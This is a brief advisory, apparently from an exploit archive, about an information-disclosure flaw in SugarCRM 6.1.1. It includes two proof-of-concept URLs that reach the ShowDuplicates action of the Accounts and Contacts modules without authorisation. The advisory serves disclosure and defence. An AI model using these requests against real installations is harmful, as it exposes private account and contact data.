SugarCRM 6.1.1 - Information Disclosure

source: https://www.securityfocus.com/bid/46885/info

SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 


http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates

http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates